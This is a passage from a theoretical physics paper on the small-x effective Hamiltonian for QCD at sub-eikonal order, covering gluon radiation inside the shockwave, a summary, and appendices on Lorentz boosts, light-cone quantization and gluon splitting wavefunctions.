}(L^{+},w^{+})U^{dc}_{\mathbf{x}_{1}}(w^{+},-L^{+})\right] \tag{4.37}\] \[= -N_{c}{\rm Tr}\left[\partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x} _{1}}(L^{+},w^{+})U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{\mathbf{x}_{2}}(L ^{+},-L^{+})\right]\] and \[iga_{b}^{i}(\mathbf{x}_{1})U^{ee^{\prime}}_{\mathbf{x}_{1}}(L^{+ },w^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})U^{dc}_{\mathbf{x} _{1}}(w^{+},-L^{+})2(T^{d}T^{e^{\prime}})_{h^{\prime}b}T^{e}_{c^{\prime}h}U^{hc }_{\mathbf{x}_{2}}(L^{+},-L^{+}) \tag{4.38}\] \[= N_{c}{\rm Tr}[U_{\mathbf{x}_{1}}(L^{+},w^{+})iga^{i}(\mathbf{x} _{1})U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{\mathbf{x}_{2}}(L^{+},-L^{+})].\] The final result for \(\mathcal{M}_{\rm I}\) is \[\begin{split}\mathcal{M}_{\rm I}=&\lambda_{1}\delta_{ \lambda_{1}\lambda_{2}}g^{2}N_{c}\frac{\Delta y}{2\pi}\frac{i}{2\pi}\frac{i \epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_{1}-\mathbf{x}_ {2}|^{2}}\\ &\qquad\times\frac{1}{2p^{+}}\int_{-L^{+}}^{L^{+}}dw^{+}{\rm Tr} \left[U_{\mathbf{x}_{1}}(L^{+},w^{+})\overleftarrow{\mathcal{D}}^{i}_{ \mathbf{x}_{1}}U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{\mathbf{x}_{2}}(L^ {+},-L^{+})\right].\end{split} \tag{4.39}\] The integration over longitudinal momentum gives \(\int dq^{+}/q^{+}=\Delta y\). We analyze the second term in eq. (4.34), corresponding to the second diagram in Fig. 5. \[\begin{split}&\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ +},\mathbf{x}_{2}^{\prime})\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^{\prime +},\mathbf{x}_{1}^{\prime})\hat{S}(L^{+},-L^{+})\hat{S}(-L^{+},-\infty)\hat{a }_{c,\lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})\hat{a}_{c,\lambda_{1}} ^{\dagger}(p_{1}^{+},\mathbf{x}_{1})|0\rangle\\ =&\sum_{e,e_{2},\kappa,\kappa_{2}}\int_{q^{+},q_{2}^{ +},\mathbf{y}_{2},\mathbf{y}}\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{2}^{ \prime+},\mathbf{x}_{2}^{\prime})\hat{W}(L^{+},-L^{+})\hat{a}_{e_{2},\kappa_{ 2}}^{\dagger}(q_{2}^{+},\mathbf{y}_{2})|0\rangle\\ &\qquad\times\langle 0|\hat{a}_{c^{\prime},\lambda^{\prime}}(p_{1}^{ \prime+},\mathbf{x}_{1}^{\prime})\hat{S}(L^{+},-L^{+})\hat{a}_{c,\lambda_{1}} ^{\dagger}(p_{1}^{+},\mathbf{x}_{1})\hat{a}_{c,\kappa}^{\dagger}(q^{+}, \mathbf{y})|0\rangle\\ &\qquad\times\langle 0|\hat{a}_{e,\kappa}(q^{+},\mathbf{y})\hat{a}_{e _{2},\kappa_{2}}(q_{2}^{+},\mathbf{y}_{2})\hat{S}(-L^{+},-\infty)\hat{a}_{c, \lambda_{2}}^{\dagger}(p_{2}^{+},\mathbf{x}_{2})|0\rangle\\ =&\sum_{e,e_{2},\kappa}\int_{q^{+},\mathbf{y}}e^{i(p _{2}^{-}-q^{-}-p_{2}^{\prime-}+i\epsilon)L^{+}}U^{c^{\prime}e_{2}}_{\mathbf{x }_{2}^{\prime}}(L^{+},-L^{+})\psi_{I}^{g\to gg}(\{p_{2}^{+},\mathbf{x}_{2},c, \lambda_{2}\};\{q^{+},\mathbf{y},e,\kappa\},\{p_{2}^{\prime+},\mathbf{x}_{2}^ {\prime},e_{2},\lambda^{\prime}\})\\ &\qquad\times\left[M_{3}^{g\to gg}(\{p_{1}^{\prime+},\mathbf{x}_{ 1}^{\prime},c^{\prime},\lambda^{\prime}\};\{q^{+},\mathbf{y},e,\kappa\},\{p_ {1}^{+},\mathbf{x}_{1},c,\lambda_{1}\})\right|_{L^{+}\leftrightarrow-L^{+}} \right]^{*}\end{split} \tag{4.40}\] Note that one has to exchange the role of \(L^{+}\) and \(-L^{+}\) when using the expression of \(M_{3}^{g\to gg}\) calculated before. Using these explicit expressions, \(\mathcal{M}_{\rm II}\) becomes \[\begin{split}\mathcal{M}_{\rm II}=&\sum_{e,e_{2}, \kappa}\int_{q^{+}}e^{i(p_{2}^{-}-q^{-}-p_{2}^{\prime-}+i\epsilon)L^{+}}g^{2}(-2 \lambda_{1}\delta_{\lambda_{1}\lambda_{2}})\frac{i}{2\pi}\frac{i\epsilon^{ij}( \mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{|\mathbf{x}_{1}-\mathbf{x}_{2}|^{2}}U^{c ^{\prime}e_{2}}_{\mathbf{x}_{2}}(L^{+},-L^{+})T^{e}_{e_{2}c}\\ &\qquad\times\frac{1}{2p_{1}^{+}}\int_{-L^{+}}^{L^{+}}dw^{+} \Big{(}if^{h^{\prime}e^{\prime}h}\left[-2\partial_{\mathbf{x}_{1}}^{i}U^{c^{ \prime}e}_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{hc}_{\mathbf{x}_{1}}(w^{+},-L^{+}) U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})\right]\\ &\qquad+iga_{b}^{i}(\mathbf{x}_{1})U^{e^{\prime}e}_{\mathbf{x}_{1 }}(w^{+},-L^{+})U^{hc}_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{c^{\prime}h^{\prime}}_{ \mathbf{x}_{1}}(L^{+},w^{+})2(T^{h^{\prime}}T^{e^{\prime}})_{hb}\Big{)}\end{split} \tag{4.41}\] Again, the Wilson line structures can be simplified as \[\begin{split}& if^{h^{\prime}e^{\prime}h}\left[-2\partial_{\mathbf{x }_{1}}^{i}U^{e^{\prime}e}_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{hc}_{\mathbf{x}_{1 }}(w^{+},-L^{+})U^{c^{\prime}h^{\prime}}_{\mathbf{x}_{1}}(L^{+},w^{+})\right]U ^{c^{\prime}e_{2}}_{\mathbf{x}_{2}}(L^{+},-L^{+})T^{e}_{e_{2}c}\\ =& N_{c}{\rm Tr}[U_{\mathbf{x}_{1}}(L^{+},w^{+}) \partial_{\mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{ \mathbf{x}_{2}}]\end{split} \tag{4.42}\] and \[\begin{split}&iga_{b}^{i}(\mathbf{x}_{1})U^{e^{\prime}e}_{\mathbf{x }_{1}}(w^{+},-L^{+})U^{hc}_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{c^{\prime}h^{\prime}} _{\mathbf{x}_{1}}(L^{+},w^{+})2(T^{h^{\prime}}T^{e^{\prime}})_{hb}U^{c^{\prime} e_{2}}_{\mathbf{x}_{2}}(L^{+},-L^{+})T^{e}_{e_{2}c}\\ =& N_{c}{\rm Tr}\left[U_{\mathbf{x}_{1}}(L^{+},w^{+})iga^{i}( \mathbf{x}_{1})U_{\mathbf{x}_{1}}(w^{+},-L^{+})U^{\dagger}_{\mathbf{x}_{2}}(L^{+},-L ^{+})\right]\end{split} \tag{4.43}\] he final result for the second amplitude is \[\mathcal{M}_{\rm II}=-\lambda_{1}\delta_{\lambda_{1}\lambda_{2}}g^{2}N_{c}\frac{ \Delta y}{2\pi}\frac{i}{2\pi}\frac{i\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2} )^{j}}{|\mathbf{x}_{1}-\mathbf{x}_{2}|^{2}}\frac{1}{2p_{1}^{+}}\int_{-L^{+}}^{ L^{+}}dw^{+}{\rm Tr}[U_{\mathbf{x}_{1}}(L^{+},w^{+})\overrightarrow{\mathcal{D}}_{ \mathbf{x}_{1}}^{i}U_{\mathbf{x}_{1}}(w^{+},-L^{+})U_{\mathbf{x}_{2}}^{\dagger }]. \tag{111}\] Combining the two amplitudes \[\mathcal{M}_{\rm I}+\mathcal{M}_{\rm II}\] \[= -\lambda_{1}\delta_{\lambda_{1}\lambda_{2}}g^{2}N_{c}\frac{\Delta y }{2\pi}\frac{i}{2\pi}\frac{i\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j} }{|\mathbf{x}_{1}-\mathbf{x}_{2}|^{2}}\frac{1}{2p_{1}^{+}}\int_{-L^{+}}^{L^{+ }}dw^{+}{\rm Tr}\left[U_{\mathbf{x}_{1}}(L^{+},w^{+})(\overrightarrow{ \mathcal{D}}_{\mathbf{x}_{1}}^{i}-\overleftarrow{\mathcal{D}}_{\mathbf{x}_{1} }^{i})U_{\mathbf{x}_{1}}(w^{+},-L^{+})U_{\mathbf{x}_{2}}^{\dagger}\right]\] \[= \lambda_{1}\delta_{\lambda_{1}\lambda_{2}}\frac{2\alpha_{s}N_{c} \Delta y}{\pi}\frac{\epsilon^{ij}(\mathbf{x}_{1}-\mathbf{x}_{2})^{j}}{| \mathbf{x}_{1}-\mathbf{x}_{2}|^{2}}{\rm Tr}[U_{\mathbf{x}_{1}}^{iG[2]}U_{ \mathbf{x}_{2}}^{\dagger}]. \tag{112}\] The results of the two amplitudes coincide with eq. (105). From the above expression, one can see that there is no tranvserle coordinate integration. Therefore, these two diagrams only contribute in the single logarithmic approximation [32]. One could also draw diagrams as shown in Fig. 6. However, these two diagrams vanish because the background field induced triple gluon vertex is local in transverse coordinates while the soft gluon radiation is nonlocal in transverse coordinates. We used two examples to show the importance of gluon radiation inside the shockwave. It contributes both to the longitudinal double-spin asymmetry of soft gluon production and to the rapidity evolution of polarized Wilson line correlator. It turns out that in both cases, the final result is related to chromo-electrically polarized Wilson line correlator \(\langle{\rm Tr}[U_{\mathbf{x}}^{iG[2]}U_{\mathbf{y}}^{\dagger}]\rangle\). In [12], it has been derived that the small \(x\) limit of gluon helicity TMD is directly related to \(\langle{\rm Tr}[U_{\mathbf{x}}^{iG[2]}U_{\mathbf{y}}^{\dagger}]\rangle\). \[\Delta G_{L}(x,\mathbf{k}^{2})= \frac{4i}{g^{2}}\epsilon^{ij}\mathbf{k}^{i}\int d^{2}\mathbf{x}d^ {2}\mathbf{y}e^{-i\mathbf{k}_{\perp}\cdot(\mathbf{x}-\mathbf{y})}\Big{\langle} {\rm Tr}\left[U_{\mathbf{y}}^{\dagger}U_{\mathbf{x}}^{jG[2]}(k^{+})-U_{\mathbf{ y}}^{jG[2]\dagger}(k^{+})U_{\mathbf{x}}\right]\Big{\rangle}. \tag{113}\] One therefore conclude that the gluon radiation inside the shockwave manifesting itself in the form of the gluon polarized Wilson line correlator \({\rm Tr}[U_{\mathbf{x}}^{iG[2]}U_{\mathbf{y}}^{\dagger}]\), being characterized by chromo-electric field \(f^{-i}\), is related to the small \(x\) limit of gluon helicity TMD. Figure 6: These two diagrams vanish. The red gluon lines represent the background gluon fields. Summary In this paper, we have derived the small-\(x\) effective Hamiltonian for QCD in high energy within the shockwave formalism. The results are given in eqs. (36), (37), (38) valid up to sub-eikonal order. The straightforward continuation of the analysis to higher orders of eikonality is possible but probably very tedious. The use of a Hamiltonian approach to investigate high energy QCD at the eikonal order can be found in [33; 34]. We also established the approach to compute \(S\)-matrix elements up to sub-eikonal order in eq. (21). As an application, various single quark/gluon scattering amplitudes, known as the polarized Wilson lines, are reproduced. This effective Hamiltonian approach, alternative to other approaches [12; 19; 21; 23] has the advantage of directly isolating the relevant interactions up to sub-eikonal order and is particularly suitable to compute spin related observables at small \(x\). The behavior of the eikonal interaction vertex eq. (36) under rapidity evolution had been carefully examined before, leading to the derivation of the JIMWLK renormalization group equation from a field theoretical approach in [35; 36; 37; 38]. The JIMWLK equation is general in the sense that it can be applied to any spin-independent observables at small \(x\). For example, applying the JIMWLK equation on dipole correlator generates the Balitsky hierarchy and reproduces the BK equation in the large \(N_{c}\)[39; 40]. Currently, the small \(x\) rapidity evolutions beyond eikonal order, particularly related to spin-dependent observables, are analyzed in an observable-by-observable way. Since we have identified the relevant interaction vertices and propagators at the sub-eikonal order in the small \(x\) effective Hamiltonian, it would be very interesting though challenging to derive a general renormalization group equation that is valid at sub-eikonal order and automatically reproduces the evolution equations when being applied to different observables [41; 42]. On the other hand, the small \(x\) effective Hamiltonian approach offers the possibility to bridge high energy QCD to the general methodology in Hamiltonian formalism. As has been demonstrated that JIMWLK equation can be reproduced by the quantum Lindblad equation through quantum-classical correspondance [43; 44]. At the sub-eikonal order, the Hilbert space is enlarged as spin related degrees of freedoms start playing roles. It would also be very interesting to see if the Linblad formalism still applies to small \(x\) helicity evolution using the small \(x\) effective Hamiltonian. One of the new features of small-\(x\) effective Hamiltonian at sub-eikonal order is that gluons can be emitted inside the shockwave. This phenomenon has been barely discussed in the literature. We studied its effect in two situations: longitudinal double-spin asymmetry for soft gluon production in polarized collisions and rapidity evolution of polarized Wilson lines. In both cases, it is found that the contribution is given by the chromo-electrically polarized Wilson line correlator \(\langle\mathrm{Tr}[U_{\mathbf{x}}^{iG[2]}U_{\mathbf{y}}^{\dagger}]\rangle\), which has been shown to be directly related to gluon helicity TMD in the small \(x\) limit. It would be very interesting to see how gluon radiation inside the shockwave impacts the small \(x\) rapidity evolutions and particle productions in phenomenological applications. The small-\(x\) effective Hamiltionian approach is developed within the light-cone quantization framework. As a result, it inevitably inherits the same zero mode problem [26]. Recently, it was brought out that the chiral anomaly in polarized inclusive deep inelastic scatterings might be sensitive to zero modes [45; 46] (see also [47; 48]), which could have been missed by the current approach. Nevertheless, the small-\(x\) effective Hamiltonian approach provides a systematic way of directly computing spin related observables including particle and jet productions in the small \(x\) limit. Of particular interest is the double-spin asymmetry for particle and jet productions in longitudinally polarized collisions relevant to experimental measurements at RHIC [49; 50; 51; 52; 53; 54; 55; 56; 57; 58; 59; 60; 61; 62; 63; 64]. This could include productions of neutral pion, \(\eta\)-meson, charged pions and \(J/\psi\) at midrapidity, intermediate rapdity and forward rapidity, respectively. Double-spin asymmetry for direct photon production has also been measured at RHIC. Applications to deep inelastic scatterings relevant to future EIC would also be very intersting. We plan to study these observables in future works. I thank Yuri Kovchegov for very helpful and inspiring discussions. I am grateful to Daniel Adamiak for discussions and checking many equations in the paper. I also appreciate very interesting conversations with Florian Cougoulic and Guillaume Beuf on related topics. This material is based upon work supported by the U.S. Department of Energy, Office of Science, Office of Nuclear Physics under Award Number DE-SC0004286. ## Appendix A Boost Transformations of Vector and Spinor Fields The vector fields and the spinor fields constitute different representations of the the Lorentz group. Their transformations under boost are obtained explicitly in this section. The general Lorentz group representation is \[U(\omega_{\mu\nu})=\exp\left\{-\frac{i}{2}\omega_{\mu\nu}J^{\mu\nu}\right\}.\] (A.1) Here \(J^{\mu\nu}\) are the generators of the Lorentz group and \(\omega_{\mu\nu}\) are the corresponding tranformation parameters. It is antisymmetric tensor. The generators satisfy the commutation relations \[\left[J^{\mu\nu},J^{\rho\sigma}\right]=i(g^{\nu\rho}J^{\mu\sigma}-g^{\mu\rho}J ^{\nu\sigma}-g^{\nu\sigma}J^{\mu\rho}+g^{\mu\sigma}J^{\nu\rho}).\] (A.2) For the vector representation, the generators have the following explicit expression \[(J^{\mu\nu})^{\alpha}_{\ \beta}=i(g^{\mu\alpha}\delta^{\nu}_{\ \beta}-g^{\nu \alpha}\delta^{\mu}_{\ \beta}).\] (A.3) We are interested in the boost along z-axis, the transformation is \[U(\omega)=e^{-i\omega K^{3}}\] (A.4) with \[K^{3}=J^{03}=i\begin{pmatrix}0&0&0&1\\ 0&0&0&0\\ 0&0&0&0\\ 1&0&0&0\end{pmatrix}.\] (A.5) One obtains \[U(\omega)\equiv\Lambda=\begin{pmatrix}\cosh\omega&0&0&\sinh\omega\\ 0&1&0&0\\ 0&0&1&0\\ \sinh\omega&0&0&\cosh\omega\end{pmatrix}.\] (A.6) Under Lorentz boost, the gluon field transforms as \(\widetilde{A}^{\mu}(x)=U(\omega)A^{\mu}(\Lambda^{-1}x)\). The explicit expressions for each component are \[\begin{split}&\widetilde{A}^{+}=e^{\omega}A^{+}(e^{-\omega}x^{+},e ^{\omega}x^{-},\mathbf{x}_{\perp}),\\ &\widetilde{A}^{-}=e^{-\omega}A^{-}(e^{-\omega}x^{+},e^{\omega}x^{-}, \mathbf{x}_{\perp}),\\ &\widetilde{A}^{i}=A^{i}(e^{-\omega}x^{+},e^{\omega}x^{-}, \mathbf{x}_{\perp}).\end{split}\] (A.7) For the spinor representation \(U(\omega)=e^{-\frac{i}{2}\omega_{\mu\nu}S^{\mu\nu}}\) with the generators \(S^{\mu\nu}=\frac{i}{4}[\gamma^{\mu},\gamma^{\nu}]\), the boost operation has the explicit expression \[U(\omega)=e^{-i\omega K^{3}}\] (A.8) with \[K^{3}=S^{03}=\frac{i}{2}\gamma^{0}\gamma^{3}.\] (A.9) One can then obtain \[U(\omega)=\sinh\frac{\omega}{2}\gamma^{0}\gamma^{3}+\cosh\frac{\omega}{2}=e^{ \frac{\omega}{2}}\mathcal{P}_{G}+e^{-\frac{\omega}{2}}\mathcal{P}_{B}\] (A.10) It is interesting to note that the good component \(\psi_{G}=\mathcal{P}_{G}\psi\) and the bad component \(\psi_{B}=\mathcal{P}_{B}\psi\) transform differently under Lorentz boost. \[\begin{split}&\widetilde{\psi}_{G}=e^{\omega/2}\psi_{G}(e^{- \omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{\perp}),\\ &\widetilde{\psi}_{B}=e^{-\omega/2}\psi_{B}(e^{-\omega}x^{+},e^{ \omega}x^{-},\mathbf{x}_{\perp}).\end{split}\] (A.11) Using the above transformations, one can also compute the transformations of field strength tensor under Lorentz boost. For example, for \(F^{+-}=\partial_{-}A^{-}-\partial_{+}A^{+}+ig[A^{+},A^{-}]\), one obtains \[\begin{split}\widetilde{F}^{+-}=&\partial_{-}e^{- \omega}A^{-}(e^{-\omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{\perp})-\partial_{+} e^{\omega}A^{+}(e^{-\omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{\perp})\\ &+ig\Big{[}A^{+}(e^{-\omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{ \perp}),A^{-}(e^{-\omega}x^{+},e^{\omega}x^{-},\mathbf{x}_{\perp})\Big{]}\\ =&\tilde{\partial}_{-}A^{-}(\tilde{x}^{+},\tilde{x}^{ -},\mathbf{x}_{\perp})-\tilde{\partial}_{+}A^{+}(\tilde{x}^{+},\tilde{x}^{-}, \mathbf{x}_{\perp})+ig[A^{+}(\tilde{x}^{+},\tilde{x}^{-},\mathbf{x}_{\perp}),A ^{-}(\tilde{x}^{+},\tilde{x}^{-},\mathbf{x}_{\perp})]\\ =& F^{+-}(\tilde{x}^{+},\tilde{x}^{-},\mathbf{x}_{ \perp})\end{split}\] (A.12) Similarly, one obtains \[\begin{split}&\widetilde{F}^{+-}=F^{+-}(\tilde{x}^{+},\tilde{x}^{ -},\mathbf{x}_{\perp}),\\ &\widetilde{F}^{+i}=e^{\omega}F^{+i}(\tilde{x}^{+},\tilde{x}^{-}, \mathbf{x}_{\perp}),\\ &\widetilde{F}^{-i}=e^{-\omega}F^{-i}(\tilde{x}^{+},\tilde{x}^{ -},\mathbf{x}_{\perp}),\\ &\widetilde{F}^{ij}=F^{ij}(\tilde{x}^{+},\tilde{x}^{-},\mathbf{ x}_{\perp}).\end{split}\] (A.13) Convention for Light-Cone Quantization The mode expansions for the dynamical fields expressed in terms of the corresponding creation and annihilation operators are \[\begin{split} A^{\mu}_{a}(x)&=\int_{0}^{\infty}\frac{ dp^{+}}{2p^{+}(2\pi)}\int\frac{d^{2}\mathbf{p}}{(2\pi)^{2}}\sum_{\lambda}\left[e^{- ipx}\hat{a}_{a,\lambda}(p^{+},\mathbf{p})\varepsilon^{\mu}_{\lambda}(p^{+}, \mathbf{p})+e^{ipx}\hat{a}^{\dagger}_{a,\lambda}(p^{+},\mathbf{p})\varepsilon ^{*\mu}_{\lambda}(p^{+},\mathbf{p})\right],\\ \Psi_{i}(x)&=\int_{0}^{\infty}\frac{dk^{+}}{2k^{+}(2 \pi)}\int\frac{d^{2}\mathbf{k}}{(2\pi)^{2}}\sum_{\sigma}\left[e^{-ikx}\hat{b}_{ i,\sigma}(k^{+},\mathbf{k})u_{\sigma}(k^{+},\mathbf{k})+e^{+ikx}\hat{d}^{ \dagger}_{i,\sigma}(k^{+},\mathbf{k})v_{\sigma}(k^{+},\mathbf{k})\right],\end{split} \tag{113}\] with the commuation relations being \[\begin{split}\left[\hat{a}_{\lambda_{1},c_{1}}(p_{1}^{+}, \mathbf{p}_{1}),\hat{a}^{\dagger}_{\lambda_{2},c_{2}}(p_{2}^{+},\mathbf{p}_{2 })\right]&=(2p_{1}^{+})(2\pi)^{3}\delta(p_{1}^{+}-p_{2}^{+}) \delta^{(2)}(\mathbf{p}_{1}-\mathbf{p}_{2})\delta_{\lambda_{1}\lambda_{2}} \delta_{c_{1}c_{2}}\,,\\ \left\{\hat{b}_{\sigma_{1},i_{1}}(k_{1}^{+},\mathbf{k}_{1}),\hat{ b}^{\dagger}_{i_{2},\alpha_{2}}(k_{2}^{+},\mathbf{k}_{2})\right\}& =(2k_{1}^{+})(2\pi)^{3}\delta(k_{1}^{+}-k_{2}^{+})\delta^{(2)}( \mathbf{k}_{1}-\mathbf{k}_{2})\delta_{\sigma_{1}\sigma_{2}}\delta_{i_{1}i_{2}} \,,\\ \left\{\hat{d}_{\sigma_{1},i_{1}}(k_{1}^{+},\mathbf{k}_{1}),\hat{ d}^{\dagger}_{i_{2},\alpha_{2}}(k_{2}^{+},\mathbf{k}_{2})\right\}& =(2k_{1}^{+})(2\pi)^{3}\delta(k_{1}^{+}-k_{2}^{+})\delta^{(2)}( \mathbf{k}_{1}-\mathbf{k}_{2})\delta_{\sigma_{1}\sigma_{2}}\delta_{i_{1}i_{2}} \,.\end{split} \tag{114}\] We will use the shorthand notations \[\int_{p^{+}}\equiv\int_{0}^{\infty}\frac{dp^{+}}{2p^{+}(2\pi)},\quad\int_{ \mathbf{p}}\equiv\int\frac{d^{2}\mathbf{p}}{(2\pi)^{2}},\quad\int_{\mathbf{x} }\equiv\int d^{2}\mathbf{x}. \tag{115}\] It should be noted that in the free field expansions given in eq. (113), \(A^{+}=0\) and \(A^{-}=-\frac{\partial_{i}}{\partial_{-}}A^{i}\) are implementd by the requirements on the polarization vector \[\varepsilon^{+}_{\lambda}(p^{+},\mathbf{p})=0,\qquad\varepsilon^{-}_{\lambda} (p^{+},\mathbf{p})=\frac{\mathbf{p}^{i}\varepsilon^{i}_{\lambda}(p^{+}, \mathbf{p})}{p^{+}} \tag{116}\] as the independent field components are \(A^{i}\). Here \(\varepsilon^{i}_{\lambda}=\frac{1}{\sqrt{2}}(1,i\lambda)\). Similarly, for the fermion fields, not all the components of the spinors are independent \[\begin{split} u_{B,\sigma}(k)&=\frac{\gamma^{+}}{2k ^{+}}(\mathbf{k}^{j}\gamma^{j}+m)u_{G,\sigma}(k),\\ v_{B,\sigma}(k)&=\frac{\gamma^{+}}{2k^{+}}(\mathbf{ k}^{j}\gamma^{j}-m)u_{G,\sigma}(k).\end{split} \tag{117}\] For the explicit expressions of the spinor \(u(k),v(k)\), we use the Kogut-Soper convention [26; 27] (see also [65]). \[\begin{split} u(k_{1},\frac{1}{2})&=\frac{1}{2^{1/4 }\sqrt{k_{1}^{+}}}\begin{pmatrix}\sqrt{2}k_{1}^{+}\\ k_{1}^{+}+ik_{1}^{y}\\ m\\ 0\end{pmatrix}\,,\qquad u(k_{1},-\frac{1}{2})=\frac{1}{2^{1/4}\sqrt{k_{1}^{+}}} \begin{pmatrix}0\\ m\\ -k_{1}^{x}+ik_{1}^{y}\\ \sqrt{2}k_{1}^{+}\end{pmatrix},\\ v(k_{2},\frac{1}{2})&=\frac{1}{2^{1/4}\sqrt{k_{2}^{+}}} \begin{pmatrix}0\\ -m\\ -k_{2}^{x}+ik_{2}^{y}\\ \sqrt{2}k_{2}^{+}\end{pmatrix}\,,\qquad v(k_{2},-\frac{1}{2})=\frac{1}{2^{1/4 }\sqrt{k_{2}^{+}}}\begin{pmatrix}\sqrt{2}k_{2}^{+}\\ k_{2}^{x}+ik_{2}^{y}\\ -m\\ 0\end{pmatrix}\,.\end{split} \tag{118}\] In addition, the gamma matrices are taken in the chiral representation \[\gamma^{0}=\begin{pmatrix}0&1\\ 1&0\end{pmatrix}\,,\qquad\gamma^{i}=\begin{pmatrix}0&-\sigma^{i}\\ \sigma^{i}&0\end{pmatrix} \tag{104}\] Here \(\sigma^{i}\) are Pauli matrices and \(\gamma^{5}=i\gamma^{0}\gamma^{1}\gamma^{2}\gamma^{3}\). For any matrix in spinor space, it can be decomposed as \[M=AI+B_{\mu}\gamma^{\mu}+C_{\mu\nu}\sigma^{\mu\nu}+D_{\mu}\gamma^{\mu}\gamma^{5 }+E\gamma^{5} \tag{105}\] with the coefficients being \[A=\frac{1}{4}\text{Tr}[M],\quad B^{\mu}=\frac{1}{4}\text{Tr}[M\gamma^{\mu}], \quad C^{\mu\nu}=\frac{1}{8}\text{Tr}[M\sigma^{\mu\nu}],\quad D^{\mu}=-\frac{ 1}{4}\text{Tr}[M\gamma^{\mu}\gamma^{5}],\quad E=\frac{1}{4}\text{Tr}[M\gamma^{ 5}]. \tag{106}\] By explicit matrix algebra, one can verify the following identities that have been used in the main content of the paper. \[\left[\gamma_{i}u_{G,\sigma}(p^{+})\bar{u}_{G,\sigma^{\prime}}(p^{+})\gamma_{ i}\right]=p^{+}\delta_{\sigma\sigma^{\prime}}[\gamma^{-}+2\sigma\gamma^{-} \gamma^{5}]. \tag{107}\] \[\left[\gamma_{i^{\prime}}\varepsilon_{\lambda^{\prime}}^{i^{\prime}*}u_{G, \sigma}(k^{+})\bar{u}_{G,\sigma}(k^{+})\varepsilon_{\lambda}^{i}\gamma_{i} \right]=k^{+}\delta_{\lambda\lambda^{\prime}}[\gamma^{-}+\lambda\gamma^{-} \gamma^{5}]. \tag{108}\] To characterize gluon radiation, either before or after scattering with the shockwave, one needs the light-cone wavefunction for gluon splitting. This is textbook knowledge, we reproduce the result in this appendix for reference. The gluon splitting wave function from initial state has opposite sign compared to that from final state. We calculate the initial state gluon splitting. Figure 7: Gluon splitting vertex. \[\Psi^{g\to gg}(k_{1}^{+},{\bf y}_{1},c_{1},\lambda_{1};k_{2}^{+},{ \bf y}_{2},c_{2},\lambda_{2},k_{3}^{+},{\bf k}_{3},c_{3},\lambda_{3})\] \[= \frac{1}{k_{1}^{-}-k_{2}^{-}-k_{3}^{-}+i\epsilon}\langle 0|\hat{a}_{ c_{3},\lambda_{3}}(k_{3}^{+},{\bf k}_{3})\hat{a}_{ c_{2},\lambda_{2}}(k_{2}^{+},{\bf k}_{2})V_{ggg}\hat{a}_{c_{1},\lambda_{1}}^{ \dagger}(k_{1}^{+},{\bf k}_{1})|0\rangle\] \[= -(2\pi)^{3}\delta(k_{1}^{+}-k_{2}^{+}-k_{3}^{+})\delta({\bf k}_{1 }-{\bf k}_{2}-{\bf k}_{3})gf^{c_{1}c_{2}c_{3}}\left(\frac{{\bf k}_{1}^{2}}{2k_ {1}^{+}}-\frac{{\bf k}_{2}^{2}}{2zk_{1}^{+}}-\frac{({\bf k}_{1}-{\bf k}_{2})^{2 }}{2(1-z)k_{1}^{+}}\right)^{-1}\] \[\times\left[\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{ \lambda_{1}}^{j}(2z{\bf k}_{1}-2{\bf k}_{2})^{j}+\delta_{\lambda_{1}\lambda_{2 }}i\varepsilon_{\lambda_{3}}^{j*}\frac{(-2z{\bf k}_{1}+2{\bf k}_{2})^{j}}{1-z} -\delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2}}^{j*}\frac{(-2{\bf k }_{2}+2z{\bf k}_{1})^{j}}{z}\right]\] \[= -gf^{c_{1}c_{2}c_{3}}(2\pi)^{3}2k_{1}^{+}\delta(k_{1}^{+}-k_{2}^{ +}-k_{3}^{+})\delta({\bf k}_{1}-{\bf k}_{2}-{\bf k}_{3})\] \[\times\left[z(1-z)\delta_{\lambda_{2},-\lambda_{3}}i\varepsilon_{ \lambda_{1}}^{j}-z\delta_{\lambda_{1}\lambda_{2}}i\varepsilon_{\lambda_{3}}^{j* }-(1-z)\delta_{\lambda_{1}\lambda_{3}}i\varepsilon_{\lambda_{2}}^{j*}\right] \frac{2({\bf k}_{2}-z{\bf k}_{1})^{j}}{({\bf k}_{2}-z{\bf k}_{1})^{2}}\] The three-gluon vertex \(V_{ggg}\) from eq. (9) has been substituted in the second equality. The delta function enforces \(k_{2}^{+}=zk_{1}^{+}\) and \(k_{3}^{+}=(1-z)k_{1}^{+}\) and \({\bf k}_{3}={\bf k}_{1}-{\bf k}_{2}\). It is more useful to have an expression in transverse coordinate space \[\Psi^{g\to gg}(k_{1}^{+},{\bf y}_{1},c_{1},\lambda_{1};k_{2}^{+},{ \bf y}_{2},c_{2},\lambda_{2},k_{3}^{+},{\bf y}_{3},c_{3},\lambda_{3})\] \[= \int_{{\bf k}_{1},{\bf k}_{2},{\bf k}_{3}}e^{-i{\bf k}_{1}\cdot{ \bf y}_{1}}e^{i{\bf k}_{2}\cdot{\bf y}_{2}}e^{i{\bf k}_{3}\cdot{\bf y}_{3}}\ 